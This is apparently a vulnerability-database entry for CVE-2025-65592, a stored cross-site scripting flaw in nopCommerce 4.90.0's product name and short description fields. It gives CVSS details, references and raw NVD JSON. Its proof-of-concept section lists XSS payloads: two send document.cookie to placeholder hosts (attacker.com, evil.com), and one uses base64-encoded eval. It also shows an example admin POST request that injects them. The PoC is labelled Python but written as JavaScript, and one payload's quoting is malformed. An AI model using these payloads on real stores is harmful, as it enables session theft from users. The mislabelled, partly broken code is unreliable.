CVE-2025-65592

Description

nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) in the product management functionality. Malicious payloads inserted into the "Product Name" and "Short Description" fields are stored in the backend database and executed automatically whenever a user views the affected pages.

CVSS Details

CVSS Score

6.1

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:nopcommerce:nopcommerce:4.90.0:*:*:*:*:*:*:* - VULNERABLE

nopCommerce 4.90.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-65592 PoC - Stored XSS in nopCommerce Product Management
// Target: nopCommerce 4.90.0
// Attack Vector: Product Name or Short Description fields

// Step 1: Identify the product creation/editing endpoint
// Typically: /Admin/Product/Create or /Admin/Product/Edit/{productId}

// Step 2: Inject XSS payload in Product Name field
const xssPayload1 = '<script>console.log(document.cookie)</script>';

// Alternative payload using img tag
const xssPayload2 = '<img src=x onerror="fetch(\"https://attacker.com/steal?c=\"+document.cookie)\\>">';

// Alternative payload using SVG element
const xssPayload3 = '<svg onload="eval(atob(\"YWxlcnQoZG9jdW1lbnQuY29va2llKQ==\"))">';

// Step 3: Inject XSS payload in Short Description field
const xssPayload4 = '<iframe src="javascript:alert(document.domain)">';

// Example HTTP POST request (simplified)
/*
POST /Admin/Product/Save HTTP/1.1
Host: target.com
Content-Type: application/x-www-form-urlencoded

Name=<script>alert(document.cookie)</script>&ShortDescription=<img src=x onerror=fetch('https://evil.com/?c='+document.cookie)>&
*/

// Step 4: When any user views the affected product page, the XSS will execute automatically

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-65592
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-65592
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-65592/
[4] VulDB https://vuldb.com/cve/CVE-2025-65592
[5] https://seclists.org/fulldisclosure/2025/Dec/19
[6] https://www.nopcommerce.com/
[7] http://seclists.org/fulldisclosure/2025/Dec/19

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-65592", "sourceIdentifier": "[email protected]", "published": "2025-12-16T19:15:58.967", "lastModified": "2025-12-19T16:40:13.203", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "nopCommerce 4.90.0 is vulnerable to Cross Site Scripting (XSS) in the product management functionality. Malicious payloads inserted into the \"Product Name\" and \"Short Description\" fields are stored in the backend database and executed automatically whenever a user views the affected pages."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "baseScore": 6.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.7}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:nopcommerce:nopcommerce:4.90.0:*:*:*:*:*:*:*", "matchCriteriaId": "1FC64557-EDFD-4460-8793-8C452638D782"}]}]}], "references": [{"url": "https://seclists.org/fulldisclosure/2025/Dec/19", "source": "[email protected]", "tags": ["Mailing List", "Third Party Advisory"]}, {"url": "https://www.nopcommerce.com/", "source": "[email protected]", "tags": ["Product"]}, {"url": "http://seclists.org/fulldisclosure/2025/Dec/19", "source": "af854a3a-2127-422b-91ae-364da2661108", "tags": ["Mailing List", "Third Party Advisory"]}]}}